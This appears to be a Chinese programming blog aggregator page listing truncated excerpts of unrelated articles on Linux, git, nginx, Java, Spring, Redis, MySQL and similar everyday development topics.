    1.Linux软件开发、调试与维护内核与系统结构Linux内核是操作系统的核心,负责管理硬件资源,提供系统服务,它是系统软件与硬件之间的桥梁。主要组成部分包括:进程管理:内核通过调度器分配CPU时间给各个进程,实现进程的创建、调度、终止等操作。使用进程描述符(task_struct)来存储进程信息,包括状态(就绪、运行、阻塞等)、优先级、内存映射等。内存管理:包括物理内存和虚拟内存管理。通过页表映
  • linux脚本sed替换变量,sed 命令中替换值为shell变量 诺坎普之约 linux脚本sed替换变量
    文章目录sed命令中替换值为shell变量替换基本语法sed中替换使用shell变量总结参考文档sed命令中替换值为shell变量替换基本语法大家都是sed有很多用法,最多就应该是替换一些值了。让我们先回忆sed的替换语法。在sed进行替换的时候sed-i's/old/new/g'1.txtecho"hellooldfrank"|sed's/old/new/g'结果如下:hellonewfrank
  • RK3229_Android9.0_Box 4G模块EC200A调试 suifen_ 网络
    0、kernel修改这部分完全可以参考Linux的移植:RK3588EC200A-CN【4G模块】调试_rkec200a-cn-CSDN博客1、修改device/rockchip/rk322xdiff--gita/device.mkb/device.mkindexec6bfaa..e7c32d1100755---a/device.mk+++b/device.mk@@-105,6+105,8@@en
  • linux 安装Sublime Text 3 hhyiyuanyu Python学习linuxsublimetext
    方法/步骤打开官网http://www.sublimetext.com/3,选择64位进行下载执行命令wgethttps://download.sublimetext.com/sublime_text_3_build_3126_x64.tar.bz2进行下载3、下载完成进行解压,执行tar-xvvfsublime_text_3_build_3126_x64.tar.bz解压4、解压完成以后,移动到
  • KVM虚拟机源代码分析【转】 xidianjiapei001 #虚拟化技术
    1.KVM结构及工作原理1.1KVM结构KVM基本结构有两部分组成。一个是KVMDriver,已经成为Linux内核的一个模块。负责虚拟机的创建,虚拟内存的分配,虚拟CPU寄存器的读写以及虚拟CPU的运行等。另外一个是稍微修改过的Qemu,用于模拟PC硬件的用户空间组件,提供I/O设备模型以及访问外设的途径。KVM基本结构如图1所示。其中KVM加入到标准的Linux内核中,被组织成Linux中标准
  • 史上最全git命令,git回滚,git命令大全 騒周 其他git
    git命令大全一、Git整体理解二、由暂存区本地仓库三、由本地仓->远程仓库四、冲突处理五、Git分支操作六、bug的分支七、feature分支八、暂存的使用九、远程仓的操作十、标签的使用十一、Git配置全局信息十二、Linux的一些简单操作和一些符号的解释十三、符号解释十四、显示安装详细信息十五、gitconfig十六、Gitclone十七、Gitinit十八、gitstatus十九、gitre
  • 【显示 后台运行 & 的命令】 晨春计 debuglinux服务器运维
    目录背景步骤详解示例背景当你在Linuxshell中使用&符号将一个命令放到后台运行时,你可以使用jobs命令来查看这些后台进程的状态。但是,jobs命令并不会直接显示进程的PID(进程ID)。它会显示一个作业列表,其中包括每个作业的状态和一个作业标识符(通常是百分号%后面跟着一个数字),但不会直接显示PID。获取后台进程的PID步骤:1、使用jobs命令查看后台作业。2、使用ps命令配合grep
  • Android shell 常用 debug 命令 晨春计 Audiodebugandroidlinux
    目录1、查看版本2、am命令3、pm命令4、dumpsys命令5、sed命令6、log定位查看APK进程号7、log定位使用场景1、查看版本1.1、Android串口终端执行getpropro.build.version.release#获取Android版本uname-a#查看linux内核版本信息uname-r#单独查看内核版本1.2、linux服务器执行lsb_release-a#查看Lin
  • 【nginx】ngx_http_proxy_connect_module 正向代理 等风来不如迎风去 网络服务入门与实战nginxhttp运维
    50.65无法访问服务器,(403错误)50.196可以访问服务器。那么,配置65通过196访问。需要一个nginx作为代理【nginx】搭配okhttp配置反向代理发送原生的nginx是不支持okhttp的CONNECT请求的。大神竟然给出了一个java工程GINX编译ngx_http_proxy_connect_module及做正向代理是linux构建的。是windows构建的:编译Windo
  • linux下好用的任务管理器htop WittXie Linuxlinux服务器运维
    给大家推荐个好用的任务管理器htop,简直好用的不得了。完虐top。不解释了,看文章!!!在Linux系统中,top命令用来显示系统中正在运行的进程的实时状态,它显示了一些非常有用的信息,比如CPU利用情况、内存消耗情况,以及每个进程情况等。但是,你知道吗?还有另外一个命令行工具'htop',它与传统的top命令功能一样,但它有更加强大的功能及能显示更多的信息。这篇文章,我们会用实例来讨论这个'h
  • Linux下使用U盘 WittXie Linuxlinux运维服务器
    第一步:插入U盘,如果能够识别出U盘,则会打印出一些信息;第二步:查看U盘系统分配给U盘的设备名;输入如下命令进行查看:fdisk-l/dev/sda如果打印出如下信息:Disk/dev/sda:4233MB,4233101312bytes165heads,34sectors/track,1473cylindersUnits=cylindersof5610*512=2872320bytesDevi
  • java的(PO,VO,TO,BO,DAO,POJO) Cb123456 VOTOBOPOJODAO
    转: http://www.cnblogs.com/yxnchinahlj/archive/2012/02/24/2366110.html   -------------------------------------------------------------------  O/R Mapping 是 Object Relational Mapping(对象关系映
  • spring ioc原理(看完后大家可以自己写一个spring) aijuans spring
             最近,买了本Spring入门书:spring In Action 。大致浏览了下感觉还不错。就是入门了点。Manning的书还是不错的,我虽然不像哪些只看Manning书的人那样专注于Manning,但怀着崇敬 的心情和激情通览了一遍。又一次接受了IOC 、DI、AOP等Spring核心概念。 先就IOC和DI谈一点我的看法。IO
  • MyEclipse 2014中Customize Persperctive设置无效的解决方法 Kai_Ge MyEclipse2014
    高高兴兴下载个MyEclipse2014,发现工具条上多了个手机开发的按钮,心生不爽就想弄掉他! 结果发现Customize Persperctive失效!! 有说更新下就好了,可是国内Myeclipse访问不了,何谈更新... so~这里提供了更新后的一下jar包,给大家使用! 1、将9个jar复制到myeclipse安装目录\plugins中 2、删除和这9个jar同包名但是版本号较
  • SpringMvc上传 120153216 springMVC
      @RequestMapping(value = WebUrlConstant.UPLOADFILE) @ResponseBody public Map<String, Object> uploadFile(HttpServletRequest request,HttpServletResponse httpresponse) { try { //
  • Javascript----HTML DOM 事件 何必如此 JavaScripthtmlWeb
    HTML DOM 事件允许Javascript在HTML文档元素中注册不同事件处理程序。 事件通常与函数结合使用,函数不会在事件发生前被执行! 注:DOM: 指明使用的 DOM 属性级别。 1.鼠标事件 属性               
  • 动态绑定和删除onclick事件 357029540 JavaScriptjquery
    因为对JQUERY和JS的动态绑定事件的不熟悉,今天花了好久的时间才把动态绑定和删除onclick事件搞定!现在分享下我的过程。      在我的查询页面,我将我的onclick事件绑定到了tr标签上同时传入当前行(this值)参数,这样可以在点击行上的任意地方时可以选中checkbox,但是在我的某一列上也有一个onclick事件是用于下载附件的,当
  • HttpClient|HttpClient请求详解 7454103 apache应用服务器网络协议网络应用Security
    HttpClient 是 Apache Jakarta Common 下的子项目,可以用来提供高效的、最新的、功能丰富的支持 HTTP 协议的客户端编程工具包,并且它支持 HTTP 协议最新的版本和建议。本文首先介绍 HTTPClient,然后根据作者实际工作经验给出了一些常见问题的解决方法。HTTP 协议可能是现在 Internet 上使用得最多、最重要的协议了,越来越多的 Java 应用程序需
  • 递归 逐层统计树形结构数据 darkranger 数据结构
    将集合递归获取树形结构: /** * * 递归获取数据 * @param alist:所有分类 * @param subjname:对应统计的项目名称 * @param pk:对应项目主键 * @param reportList: 最后统计的结果集 * @param count:项目级别 */ public void getReportVO(Arr
  • 访问WEB-INF下使用frameset标签页面出错的原因 aijuans struts2
    <frameset rows="61,*,24" cols="*" framespacing="0" frameborder="no" border="0">        
  • MAVEN常用命令 avords
    Maven库: http://repo2.maven.org/maven2/ Maven依赖查询: http://mvnrepository.com/ Maven常用命令: 1. 创建Maven的普通java项目:    mvn archetype:create    -DgroupId=packageName 
  • PHP如果自带一个小型的web服务器就好了 houxinyou apache应用服务器WebPHP脚本
    最近单位用PHP做网站,感觉PHP挺好的,不过有一些地方不太习惯,比如,环境搭建。PHP本身就是一个网站后台脚本,但用PHP做程序时还要下载apache,配置起来也不太很方便,虽然有好多配置好的apache+php+mysq的环境,但用起来总是心里不太舒服,因为我要的只是一个开发环境,如果是真实的运行环境,下个apahe也无所谓,但只是一个开发环境,总有一种杀鸡用牛刀的感觉。如果php自己的程序中
  • NoSQL数据库之Redis数据库管理(list类型) bijian1013 redis数据库NoSQL
    3.list类型及操作         List是一个链表结构,主要功能是push、pop、获取一个范围的所有值等等,操作key理解为链表的名字。Redis的list类型其实就是一个每个子元素都是string类型的双向链表。我们可以通过push、pop操作从链表的头部或者尾部添加删除元素,这样list既可以作为栈,又可以作为队列。   &nbs
  • 谁在用Hadoop? bingyingao hadoop数据挖掘公司应用场景
    Hadoop技术的应用已经十分广泛了,而我是最近才开始对它有所了解,它在大数据领域的出色表现也让我产生了兴趣。浏览了他的官网,其中有一个页面专门介绍目前世界上有哪些公司在用Hadoop,这些公司涵盖各行各业,不乏一些大公司如alibaba,ebay,amazon,google,facebook,adobe等,主要用于日志分析、数据挖掘、机器学习、构建索引、业务报表等场景,这更加激发了学习它的热情。
  • 【Spark七十六】Spark计算结果存到MySQL bit1129 mysql
    package spark.examples.db import java.sql.{PreparedStatement, Connection, DriverManager} import com.mysql.jdbc.Driver import org.apache.spark.{SparkContext, SparkConf} object SparkMySQLInteg
  • Scala: JVM上的函数编程 bookjovi scalaerlanghaskell
        说Scala是JVM上的函数编程一点也不为过,Scala把面向对象和函数型编程这两种主流编程范式结合了起来,对于熟悉各种编程范式的人而言Scala并没有带来太多革新的编程思想,scala主要的有点在于Java庞大的package优势,这样也就弥补了JVM平台上函数型编程的缺失,MS家.net上已经有了F#,JVM怎么能不跟上呢?     对本人而言
  • jar打成exe bro_feng java jar exe
    今天要把jar包打成exe,jsmooth和exe4j都用了。 遇见几个问题。记录一下。 两个软件都很好使,网上都有图片教程,都挺不错。 首先肯定是要用自己的jre的,不然不能通用,其次别忘了把需要的lib放到classPath中。 困扰我很久的一个问题是,我自己打包成功后,在一个同事的没有装jdk的电脑上运行,就是不行,报错jvm.dll为无效的windows映像,如截图 最后发现
  • 读《研磨设计模式》-代码笔记-策略模式-Strategy bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ /* 策略模式定义了一系列的算法,并将每一个算法封装起来,而且使它们还可以相互替换。策略模式让算法独立于使用它的客户而独立变化 简单理解: 1、将不同的策略提炼出一个共同接口。这是容易的,因为不同的策略,只是算法不同,需要传递的参数
  • cmd命令值cvfM命令 chenyu19891124 cmd
         cmd命令还真是强大啊。今天发现jar -cvfM aa.rar @aaalist 就这行命令可以根据aaalist取出相应的文件   例如:      在d:\workspace\prpall\test.java 有这样一个文件,现在想要将这个文件打成一个包。运行如下命令即可比如在d:\wor
  • OpenJWeb(1.8) Java Web应用快速开发平台 comsci java框架Web项目管理企业应用
        OpenJWeb(1.8) Java Web应用快速开发平台的作者是我们技术联盟的成员,他最近推出了新版本的快速应用开发平台  OpenJWeb(1.8),我帮他做做宣传   OpenJWeb快速开发平台以快速开发为核心,整合先进的java 开源框架,本着自主开发+应用集成相结合的原则,旨在为政府、企事业单位、软件公司等平台用户提供一个架构透
  • Python 报错:IndentationError: unexpected indent daizj pythontab空格缩进
        IndentationError: unexpected indent 是缩进的问题,也有可能是tab和空格混用啦     Python开发者有意让违反了缩进规则的程序不能通过编译,以此来强制程序员养成良好的编程习惯。并且在Python语言里,缩进而非花括号或者某种关键字,被用于表示语句块的开始和退出。增加缩进表示语句块的开
  • HttpClient 超时设置 dongwei_6688 httpclient
    HttpClient中的超时设置包含两个部分: 1. 建立连接超时,是指在httpclient客户端和服务器端建立连接过程中允许的最大等待时间 2. 读取数据超时,是指在建立连接后,等待读取服务器端的响应数据时允许的最大等待时间   在HttpClient 4.x中如下设置:   HttpClient httpclient = new DefaultHttpC
  • 小鱼与波浪 dcj3sjt126com
    一条小鱼游出水面看蓝天,偶然间遇到了波浪。  小鱼便与波浪在海面上游戏,随着波浪上下起伏、汹涌前进。  小鱼在波浪里兴奋得大叫:“你每天都过着这么刺激的生活吗?简直太棒了。”  波浪说:“岂只每天过这样的生活,几乎每一刻都这么刺激!还有更刺激的,要有潮汐变化,或者狂风暴雨,那才是兴奋得心脏都会跳出来。”  小鱼说:“真希望我也能变成一个波浪,每天随着风雨、潮汐流动,不知道有多么好!”  很快,小鱼
  • Error Code: 1175 You are using safe update mode and you tried to update a table dcj3sjt126com mysql
    快速高效用:SET SQL_SAFE_UPDATES = 0;下面的就不要看了! 今日用MySQL Workbench进行数据库的管理更新时,执行一个更新的语句碰到以下错误提示: Error Code: 1175 You are using safe update mode and you tried to update a table without a WHERE that
  • 枚举类型详细介绍及方法定义 gaomysion enumjavaee
    转发 http://developer.51cto.com/art/201107/275031.htm 枚举其实就是一种类型,跟int, char 这种差不多,就是定义变量时限制输入的,你只能够赋enum里面规定的值。建议大家可以看看,这两篇文章,《java枚举类型入门》和《C++的中的结构体和枚举》,供大家参考。 枚举类型是JDK5.0的新特征。Sun引进了一个全新的关键字enum
  • Merge Sorted Array hcx2013 array
    Given two sorted integer arrays nums1 and nums2, merge nums2 into nums1 as one sorted array. Note:You may assume that nums1 has enough space (size that is
  • Expression Language 3.0新特性 jinnianshilongnian el 3.0
    Expression Language 3.0表达式语言规范最终版从2013-4-29发布到现在已经非常久的时间了;目前如Tomcat 8、Jetty 9、GlasshFish 4已经支持EL 3.0。新特性包括:如字符串拼接操作符、赋值、分号操作符、对象方法调用、Lambda表达式、静态字段/方法调用、构造器调用、Java8集合操作。目前Glassfish 4/Jetty实现最好,对大多数新特性
  • 超越算法来看待个性化推荐 liyonghui160com 超越算法来看待个性化推荐
             一提到个性化推荐,大家一般会想到协同过滤、文本相似等推荐算法,或是更高阶的模型推荐算法,百度的张栋说过,推荐40%取决于UI、30%取决于数据、20%取决于背景知识,虽然本人不是很认同这种比例,但推荐系统中,推荐算法起的作用起的作用是非常有限的。       就像任何
  • 写给Javascript初学者的小小建议 pda158 JavaScript
      一般初学JavaScript的时候最头痛的就是浏览器兼容问题。在Firefox下面好好的代码放到IE就不能显示了,又或者是在IE能正常显示的代码在firefox又报错了。   如果你正初学JavaScript并有着一样的处境的话建议你:初学JavaScript的时候无视DOM和BOM的兼容性,将更多的时间花在 了解语言本身(ECMAScript)。只在特定浏览器编写代码(Chrome/Fi
  • Java 枚举 ShihLei javaenum枚举
    注:文章内容大量借鉴使用网上的资料,可惜没有记录参考地址,只能再传对作者说声抱歉并表示感谢!   一 基础 1)语法      枚举类型只能有私有构造器(这样做可以保证客户代码没有办法新建一个enum的实例)      枚举实例必须最先定义 2)特性     &nb
  • Java SE 6 HotSpot虚拟机的垃圾回收机制 uuhorse javaHotSpotGC垃圾回收VM
    官方资料,关于Java SE 6 HotSpot虚拟机的garbage Collection,非常全,英文。 http://www.oracle.com/technetwork/java/javase/gc-tuning-6-140523.html   Java SE 6 HotSpot[tm] Virtual Machine Garbage Collection Tuning &
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他